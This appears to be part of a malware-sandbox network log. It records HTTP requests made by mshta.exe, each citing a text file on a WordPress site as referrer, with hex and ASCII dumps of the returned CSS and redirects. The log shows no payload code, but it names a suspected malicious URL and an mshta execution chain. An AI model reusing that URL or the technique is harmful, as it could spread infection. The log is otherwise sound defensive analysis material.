                                        Aug 16, 2022 10:48:41.508354902 CEST37OUTGET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: netdna.bootstrapcdn.com
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:41.535489082 CEST38INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:41 GMT
                                        Content-Type: text/css; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        CDN-PullZone: 252412
                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                        CDN-RequestCountryCode: US
                                        CDN-EdgeStorageId: 617
                                        CDN-EdgeStorageId: 617
                                        Last-Modified: Mon, 25 Jan 2021 22:04:51 GMT
                                        CDN-CachedAt: 2021-06-08 14:14:42
                                        CDN-RequestPullSuccess: True
                                        CDN-RequestPullCode: 200
                                        Cache-Control: public, max-age=31919000
                                        timing-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        access-control-allow-origin: *
                                        x-content-type-options: nosniff
                                        CDN-RequestId: 9256d228095e0e65283ebf5530b25e58
                                        Content-Encoding: gzip
                                        CDN-Cache: HIT
                                        CF-Cache-Status: HIT
                                        Age: 17542406
                                        Server: cloudflare
                                        CF-RAY: 73b8e9937a2b9ba1-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 38 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 5d fb 93 db 36 92 fe dd 7f 05 cf a9 9c 1d 97 29 0f 47 f3 de ca 5e 1c c7 d9 73 9d 73 76 ad 9d da bd ba 47 15 45 42 12 33 94 c8 f0 31 0f 5f e5 7f bf af 01 52 ea 16 d9 a0 72 1b d7 ae e3 21 1b 40 a3 f1 f5 03 8d 06 e7 d5 8b 7f 7a 12 bc 08 82 1f 8b 6d 13 bc be 37 75 b1 31 c1 7c 76 3a 8b ec e3 66 6d 82 2c 29 b6 59 12 2c 89 22 35 75 b6 da 9a 14 3f 55 c1 f7 45 d1 d4 4d 15 97 96 34 fc 43 ff d8 2e 3f 63 f4 65 9b e7 41 dd 66 8d 09 8a 65 50 66 49 53 ac 30 e4 1a 1c 11 63 f5 cb c0 3c c4 9b 32 37 f8 57 bc 4d 83 b4 48 da 8d d9 36 71 93 15 db 20 89 b7 c1 c2 d8 ce 96 45 8b d7 71 13 ac 9b a6 bc 79 f5 8a e6 13 bb 09 cf b2 62 16 04 9f 9a f8 31 68 cb a0 29 82 34 a6 e1 b6 c1 e7 fb ac 69 4c 85 56 b6 8b ae 65 e3 9e ce 92 62 23 7a 01 8d 25 7b 9f 25 66 5b bb 51 ff 50 a1 84 4e d0 56 2e 62 c1 ec da 64 75 90 bb 91 d3 00 53 05 db 9f de bd 0f 3e fc f8 3e 88 66 51 e0 da ee e6 50 27 55 56 36 f5 ac ce f2 59 51 ad 5e 81 ac eb 5c 74 fc e6 d3 a7 97 c1 fb b7 f4 37 09 f7 d3 eb 4f 9f 82 65 06 61 07 71 65 0e 87 fb e9 dd e7 7e ee 87 c3 15 25 24 52 b4 55 62 ec 68 1d 9f f5 ab 4d d6 84 dd 0f b3 75 b3 c9 c7 78 90 2b 7a 30 c5 37 6f 82 ef ff 03 80 3d 39 1c 31 a9 0c 20 70 67 b0 48 1b c0 44 0e bb 78 7c 85 26 af ba d1 5e 37 4d 95 2d 5a 0b 18 08 71 5b 04 79 b1 5d 41 7e 95 f9 b5 cd 2a a0 3d db 1e 2a c8 c9 cb 00 2d 82 4d 9b ac 83 b8 2c 2b 93 64 c0 4c 7a 63 bb 0c 82 a7 42 8a 8b c7 e0 87 f8 ce 04 7f 81 0c 1f 83 70 1c 81 4f 7b f8 bc
                                        Data Ascii: 8b2]6)G^ssvGEB31_Rr!@zm7u1|v:fm,)Y,"5u?UEM4C.?ceAfePfIS0c<27WMH6q Eqyb1h)4iLVeb#z%{%f[QPNV.bduS>>fQP'UV6YQ^\t7Oeaqe~%$RUbhMux+z07o=91 pgHDx|&^7M-Zq[y]A~*=*-M,+dLzcBpO{
                                        Aug 16, 2022 10:48:41.535557032 CEST40INData Raw: 6e 9b 35 b4 2b 64 6d 1c a3 7f 28 96 6c 97 6f 37 71 96 df 00 ee 77 e6 3b a9 0f f6 75 07 ff 9b 31 e0 2f 1e eb 04 5a 59 5b c2 bf 15 d5 ed 4d f0 de c4 69 f0 b1 2a d2 36 69 82 1f 9c a5 a8 82 ef 82 7f 7b ac da b6 de cf fb d6 fe 4c ea 83 c6 af 9e bc 7a
                                        Data Ascii: n5+dm(lo7qw;u1/ZY[Mi*6i{Lz?_WM&Q[>eV6Yx<#wFf3\_{g3S4r5z}2{]kyl&MM<4'rge=>}5oB}A26@eduss
                                        Aug 16, 2022 10:48:41.535589933 CEST40INData Raw: 8f c1 56 b8 eb 77 74 cc 81 dc 45 27 fb 6d e9 90 6e 9c 93 21 9d 33 6a 03 a6 18 e1 ef 5d cd 9d 9b 74 7d 9c 3e 60 82 e3 8b e6 a7 64 b3 db 3b f9 e3 fa b4 1e b5 27 e5 9e d5 1a ff 59 74 75 14 1a a5 b0 c6 a7 60 77 d9 84 2a bf c0 d8 80 24 8b b0 46 d6 25
                                        Data Ascii: VwtE'mn!3j]t}>`d;'Ytu`w*$F% 4M8!!A80G(8n|{,w'?fcAlK[c@vP(KECVZvB#:xw,;j@%OFB}&
                                        Aug 16, 2022 10:48:41.535631895 CEST41INData Raw: 65 39 35 0d 0a 47 e8 25 66 91 36 ae 83 65 55 6c 70 00 4b 02 68 90 7b c6 f9 9a cd 51 07 f7 6b fb ef 9a b2 5e b1 4d ef ba ec 2e 13 fb 4b 24 7b bb 1f 27 85 35 48 8f f7 c9 b3 ef 6c be e9 d6 3c 2e 2b 84 b4 b5 93 22 2d 25 76 78 f4 9f 4e ce 38 c4 de d6
                                        Data Ascii: e95G%f6eUlpKh{Qk^M.K${'5Hl<.+"-%vxN8tt-y~='|=OyGVw_']c1?"!G;U&"`Ft~>#a8c~1h5NXeGB~Du
                                        Aug 16, 2022 10:48:41.535674095 CEST43INData Raw: 7a a3 ef 0b 8e 74 44 f5 28 e4 0d e9 7e 9f 8a f5 0b 8e f5 ae 81 ad 74 d0 5b 70 b4 93 32 e9 94 1c e6 56 8f 74 52 11 52 c0 c8 54 59 ad c7 92 17 1c df e6 01 57 57 dc 19 9e 1f e6 17 1c e6 ab cc 13 43 5d 70 80 e7 26 ee 37 f2 c3 50 e8 42 84 12 b8 c9 a6
                                        Data Ascii: ztD(~t[p2VtRRTYWWC]p&7PBC<bCkK:54Q'y0[5pY[KaI]c%tZVFH9>]cH*{[xi-q_u2JZx1v)SgVER$ ?8Tr]q<w
                                        Aug 16, 2022 10:48:41.535707951 CEST44INData Raw: 51 24 b6 9d 2e 79 e8 31 d5 51 c4 51 cd 8f 1d 7c 6a 1e 89 4a 51 76 f4 e0 6f c4 f1 6d 1e 4a 4a 95 78 59 13 11 34 3e 5d 16 97 b5 f7 30 34 8a 44 e8 81 0f 18 ea b8 8a 38 c2 71 a5 4e af fd 8b 22 69 b9 d5 7d 59 14 89 cc 1f ca d8 f0 6d 31 1d 18 1c d8 38
                                        Data Ascii: Q$.y1QQ|jJQvomJJxY4>]04D8qN"i}Ym18ZFxQAM~qH[jEPNU,Fb^5{8S:9.PFZGj"H{$Sv#:\lD:\yy\C)r8Dj
                                        Aug 16, 2022 10:48:41.535739899 CEST44INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.2249178142.250.181.23880C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:41.555094957 CEST45OUTGET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: translate.google.com
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:41.587599039 CEST46INHTTP/1.1 301 Moved Permanently
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Tue, 16 Aug 2022 08:48:41 GMT
                                        Location: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
                                        Cross-Origin-Opener-Policy: same-origin-allow-popups
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.2249176187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:41.623996973 CEST61OUTGET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:41.843458891 CEST128INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:45:34 GMT
                                        Server: Apache
                                        ETag: "a5303e-6698-58592d3483f00"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:00 GMT
                                        Content-Length: 26264
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362822 22495139
                                        Age: 187
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 2a 0a 2a 09 47 45 4e 45 52 41 4c 0a 2a 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 61 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 69 6d 67 2c 20 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 6f 6c 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 75 6c 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 6c 69 2c 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 61 62 6c 65 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 62 6f 64 79 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 66 6f 6f 74 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 68 65 61 64 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 72 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 68 2c 20 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 74 64 0a 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 61 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 69 6d 67 2c 20 0a 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 6f 6c 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 75 6c 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 6c 69 2c 0a 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 61 62 6c 65 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 62 6f 64 79 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 66 6f 6f 74 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 68 65 61 64 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 72 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 68 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 20 74 64 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 0a 7d 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 30 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 69 6d 67 20 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 66 61 6b 65 68 6f 76 65 72 20 7b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 77 72 61 70 20 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a
                                        Data Ascii: /****************************GENERAL***************************/.camera_wrap a, .camera_wrap img, .camera_wrap ol, .camera_wrap ul, .camera_wrap li,.camera_wrap table, .camera_wrap tbody, .camera_wrap tfoot, .camera_wrap thead, .camera_wrap tr, .camera_wrap th, .camera_wrap td.camera_thumbs_wrap a, .camera_thumbs_wrap img, .camera_thumbs_wrap ol, .camera_thumbs_wrap ul, .camera_thumbs_wrap li,.camera_thumbs_wrap table, .camera_thumbs_wrap tbody, .camera_thumbs_wrap tfoot, .camera_thumbs_wrap thead, .camera_thumbs_wrap tr, .camera_thumbs_wrap th, .camera_thumbs_wrap td {background: none;border: 0;font: inherit;font-size: 100%;margin: 0;padding: 0;vertical-align: baseline;list-style: none}.camera_wrap {display: none;float: left;position: relative;z-index: 0;}.camera_wrap img {max-width: none!important;}.camera_fakehover {height: 100%;min-height: 60px;position: relative;width: 100%;z-index: 1;}.camera_wrap {width: 100%;
                                        Aug 16, 2022 10:48:41.843509912 CEST130INData Raw: 7d 0a 2e 63 61 6d 65 72 61 5f 73 72 63 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 63 61 6d 65 72 61 43 6f 6e 74 2c 20 2e 63 61 6d 65 72 61 43 6f 6e 74 65 6e 74 73 20 7b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 70
                                        Data Ascii: }.camera_src {display: none;}.cameraCont, .cameraContents {height: 100%;position: relative;width: 100%;z-index: 1;}.cameraSlide {bottom: 0;left: 0;position: absolute;right: 0;top: 0;width: 100%;}.cameraContent {b
                                        Aug 16, 2022 10:48:41.843564034 CEST131INData Raw: 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 2e 63 61 6d 65 72 61 5f 6c 65 66 74 20 2e 63 61 6d 65 72 61 5f 62 61 72 2c 20 2e 63 61 6d 65 72 61 5f 74 68 75 6d 62 73 5f 77 72 61 70 2e 63 61 6d 65 72 61 5f 72 69 67 68 74 20 2e 63 61 6d 65
                                        Data Ascii: camera_thumbs_wrap.camera_left .camera_bar, .camera_thumbs_wrap.camera_right .camera_bar {height: 100%;position: absolute;width: auto;}.camera_thumbs_wrap.camera_bottom .camera_bar, .camera_thumbs_wrap.camera_top .camera_bar {height:
                                        Aug 16, 2022 10:48:41.843622923 CEST133INData Raw: 3a 20 33 30 70 78 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 63 6f 6d 6d 61 6e 64 5f 77 72 61 70 20 2e 68 69 64 65 4e 61 76 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 63 6f 6d 6d 61 6e 64 5f 77 72 61 70 20 7b
                                        Data Ascii: : 30px;}.camera_command_wrap .hideNav {display: none;}.camera_command_wrap {left: 0;position: relative;right:0;z-index: 4;}.camera_wrap .camera_pag .camera_pag_ul {list-style: none;margin: 0;padding: 0;text-align: cente
                                        Aug 16, 2022 10:48:41.843656063 CEST134INData Raw: 70 78 20 31 70 78 20 30 70 78 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 2c 0a 09 09 69 6e 73 65 74 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 77 72 61
                                        Data Ascii: px 1px 0px rgba(255,255,255,1),inset 0px 1px 1px rgba(0,0,0,0.2);}.camera_wrap .camera_pag .camera_pag_ul li.cameracurrent > span {-moz-box-shadow: 0;-webkit-box-shadow: 0;box-shadow: 0;}.camera_pag_ul li img {display: none;po
                                        Aug 16, 2022 10:48:41.843688011 CEST135INData Raw: 75 73 3a 20 38 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 68 65 69 67 68 74 3a 20 31
                                        Data Ascii: us: 8px;border-radius: 8px;cursor: pointer;display: inline-block;height: 16px;margin: 20px 5px;position: relative;text-indent: -9999px;width: 16px;}.camera_thumbs_cont {-webkit-border-bottom-right-radius: 4px;-webkit-bord
                                        Aug 16, 2022 10:48:41.843749046 CEST137INData Raw: 35 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 2a 0a 2a 09 43 4f 4c 4f 52 53 20 26 20 53 4b 49 4e 53 0a 2a 0a 2a 2a 2a 2a 2a
                                        Data Ascii: 5px;position: relative;}/****************************COLORS & SKINS***************************/.pattern_1 .camera_overlayer {background: url(../images/patterns/overlay1.png) repeat;}.pattern_2 .camera_overlayer {background: url
                                        Aug 16, 2022 10:48:41.843785048 CEST138INData Raw: 20 73 70 61 6e 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 33 34 36 34 38 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 70 61 67 5f 75 6c 20 6c 69 20 69 6d 67 20 7b 0a 09 62 6f 72 64 65 72 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 65 36 65 36 65 36
                                        Data Ascii: span {background: #434648;}.camera_pag_ul li img {border: 4px solid #e6e6e6;-moz-box-shadow: 0px 3px 6px rgba(0,0,0,.5);-webkit-box-shadow: 0px 3px 6px rgba(0,0,0,.5);box-shadow: 0px 3px 6px rgba(0,0,0,.5);}.camera_pag_ul .thumb
                                        Aug 16, 2022 10:48:41.843815088 CEST140INData Raw: 6e 20 2e 63 61 6d 65 72 61 5f 63 6f 6d 6d 61 6e 64 73 20 3e 20 2e 63 61 6d 65 72 61 5f 70 6c 61 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 30 70 78 20 2d 32 30 30 70 78 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f
                                        Data Ascii: n .camera_commands > .camera_play {background-position: -80px -200px;}.camera_ash_skin .camera_commands > .camera_stop {background-position: -120px -200px;}/*AZURE SKIN*/.camera_azure_skin .camera_prevThumbs div {background-position
                                        Aug 16, 2022 10:48:41.843847036 CEST141INData Raw: 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 39 30 70 78 20 2d 34 30 70 78 3b 0a 7d 0a 2e 63 61 6d 65 72 61 5f 62 6c 61 63 6b 5f 73 6b 69 6e 20 2e 63 61 6d 65 72 61 5f 70 72 65 76 20 3e 20 73 70 61 6e 20 7b 0a
                                        Data Ascii: {background-position: -190px -40px;}.camera_black_skin .camera_prev > span {background-position: 0 -40px;}.camera_black_skin .camera_next > span {background-position: -40px -40px;}.camera_black_skin .camera_commands > .camera_play
                                        Aug 16, 2022 10:48:42.059011936 CEST171INData Raw: 63 6f 6d 6d 61 6e 64 73 20 3e 20 2e 63 61 6d 65 72 61 5f 73 74 6f 70 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 32 30 70 78 20 2d 33 32 30 70 78 3b 0a 7d 0a 2f 2a 42 55 52 47 55 4e 44 59 20 53 4b 49 4e 2a 2f
                                        Data Ascii: commands > .camera_stop {background-position: -120px -320px;}/*BURGUNDY SKIN*/.camera_burgundy_skin .camera_prevThumbs div {background-position: -160px -360px;}.camera_burgundy_skin .camera_nextThumbs div {background-position: -190p
                                        Aug 16, 2022 10:48:42.063242912 CEST184OUTGET /wp-content/themes/theme51253/style.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:42.279186964 CEST242INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:45:34 GMT
                                        Server: Apache
                                        ETag: "a53798-171-58592c24b7dc0"
                                        Last-Modified: Tue, 02 Apr 2019 21:24:15 GMT
                                        Content-Length: 369
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362824 22495141
                                        Age: 187
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 2d 2d 0a 09 54 68 65 6d 65 20 4e 61 6d 65 3a 20 74 68 65 6d 65 35 31 32 35 33 0a 09 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 69 6e 66 6f 2e 74 65 6d 70 6c 61 74 65 2d 68 65 6c 70 2e 63 6f 6d 2f 68 65 6c 70 2f 0a 09 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 41 20 74 68 65 6d 65 20 66 6f 72 20 57 6f 72 64 70 72 65 73 73 20 34 2e 34 2e 78 0a 09 41 75 74 68 6f 72 3a 20 54 65 6d 70 6c 61 74 65 5f 48 65 6c 70 2e 63 6f 6d 0a 09 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 69 6e 66 6f 2e 74 65 6d 70 6c 61 74 65 2d 68 65 6c 70 2e 63 6f 6d 2f 68 65 6c 70 2f 0a 09 54 65 6d 70 6c 61 74 65 3a 20 43 68 65 72 72 79 46 72 61 6d 65 77 6f 72 6b 0a 09 56 65 72 73 69 6f 6e 3a 20 33 2e 31 2e 35 0a 2d 2d 2a 2f 0a 0a 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 50 6c 65 61 73 65 2c 20 59 6f 75 20 6d 61 79 20 70 75 74 20 63 75 73 74 6f 6d 20 43 53 53 20 68 65 72 65 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a
                                        Data Ascii: /*--Theme Name: theme51253Theme URI: http://info.template-help.com/help/Description: A theme for Wordpress 4.4.xAuthor: Template_Help.comAuthor URI: http://info.template-help.com/help/Template: CherryFrameworkVersion: 3.1.5--*//* ----------------------------------------Please, You may put custom CSS here---------------------------------------- */
                                        Aug 16, 2022 10:48:42.280483961 CEST242OUTGET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:42.499169111 CEST337INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:38 GMT
                                        Server: Apache
                                        ETag: "a537b3-55b9-58592f5ac9140"
                                        Last-Modified: Tue, 02 Apr 2019 21:38:37 GMT
                                        Content-Length: 21945
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362826 20057369
                                        Age: 64
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 52 65 73 70 6f 6e 73 69 76 65 20 76 32 2e 33 2e 30 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 20 76 32 2e 30 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 0a 20 2a 0a 20 2a 20 44 65 73 69 67 6e 65 64 20 61 6e 64 20 62 75 69 6c 74 20 77 69 74 68 20 61 6c 6c 20 74 68 65 20 6c 6f 76 65 20 69 6e 20 74 68 65 20 77 6f 72 6c 64 20 40 74 77 69 74 74 65 72 20 62 79 20 40 6d 64 6f 20 61 6e 64 20 40 66 61 74 2e 0a 20 2a 2f 0a 2e 63 6c 65 61 72 66 69 78 20 7b 0a 20 20 2a 7a 6f 6f 6d 3a 20 31 3b 0a 7d 0a 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 2c 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 7d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 7d 0a 2e 68 69 64 65 2d 74 65 78 74 20 7b 0a 20 20 66 6f 6e 74 3a 20 30 2f 30 20 61 3b 0a 20 20 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 